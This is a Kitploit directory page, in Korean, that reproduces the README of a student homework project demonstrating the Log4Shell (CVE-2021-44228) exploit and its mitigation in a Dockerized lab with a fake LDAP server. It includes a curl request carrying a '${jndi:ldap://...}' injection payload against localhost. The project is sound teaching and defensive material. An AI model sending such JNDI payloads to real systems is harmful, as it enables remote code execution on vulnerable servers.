Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/serpilrivas/log4shell-homework9
Vulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationIncident ResponseLabs & Practice
GitHubserpilrivas/log4shell-homework9

log4shell-homework9

Log4Shell (CVE-2021-44228) SEAS 8405용 익스플로잇 데모. 취약한 Spring Boot 앱, 가짜 LDAP 서버, Docker 설정, MITRE 매핑, 침해 대응 및 전체 화면 녹화를 포함합니다.

저장소 보기
1년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

과제 9 – Log4Shell 취약점으로부터 시스템 보호

개요

이 프로젝트는 Dockerized Java 웹 애플리케이션을 취약한 Log4j 2.14.1과 함께 사용하여 Log4Shell 취약점(CVE-2021-44228)의 공격 및 완화를 보여줍니다. 또한 시뮬레이션된 악성 LDAP 서버를 포함하여 JNDI 인젝션 공격 경로를 설명합니다.

공격 후, Log4j 업그레이드, 입력 검증, MITRE D3FEND 및 ATT&CK 권장 사항 적용을 통해 시스템을 강화합니다.


폴더 구조

root@kitploit:~
log4shell-homework9/
├── docker-compose.yml
├── Dockerfile
├── pom.xml
├── ldap_server.py
├── src/...
├── architecture_diagram.png
├── README.md
├── mitigation_report.pdf

실행 방법

1. Java 애플리케이션 빌드 (취약한 Log4j 포함)

root@kitploit:~
docker build -t vulnerable-app .

2. Docker Compose로 애플리케이션 실행

root@kitploit:~
docker-compose up

애플리케이션은 다음 주소에서 실행됩니다:
http://localhost:8080

3. 가짜 LDAP 서버 실행 (새 터미널에서)

root@kitploit:~
python3 ldap_server.py

4. 공격 시뮬레이션

다음과 같은 요청을 애플리케이션에 보냅니다:

root@kitploit:~
curl http://localhost:8080?input=${jndi:ldap://localhost:8000/Exploit}

LDAP 서버가 요청을 수신해야 합니다 (이는 JNDI 공격을 시뮬레이션합니다).


강화 방법

공격 시연 후, 시스템은 다음을 통해 보호되었습니다:

  • Log4j를 버전 2.17.0으로 업그레이드
  • 입력 검증 (${jndi:...} 패턴 차단)
  • 설정에서 메시지 조회 비활성화
  • Docker 격리로 범위 제한
  • MITRE D3FEND 및 ATT&CK 기법 적용

MITRE 매핑

MITRE ATT&CK:

  • T1190: 공개 애플리케이션 취약점 공격
  • T1210: 원격 서비스 취약점 공격

MITRE D3FEND:

  • D3-IA: 입력 검증
  • D3-HI: 호스트 기반 침입 탐지
  • D3-DA: 안전하지 않은 기능 비활성화

보고서

mitigation_report.pdf 파일 참조:

  • 이전/이후 시스템 아키텍처
  • Log4Shell 설명
  • 완화 전략
  • 사고 대응 계획

화면 녹화

동영상이 직접 업로드되지 않은 경우, 보고서 내 링크에서 확인할 수 있습니다.


작성자

Serpil Rivas
SEAS 8405 – 사이버 보안 아키텍처
2025년 5월

도구 다운로드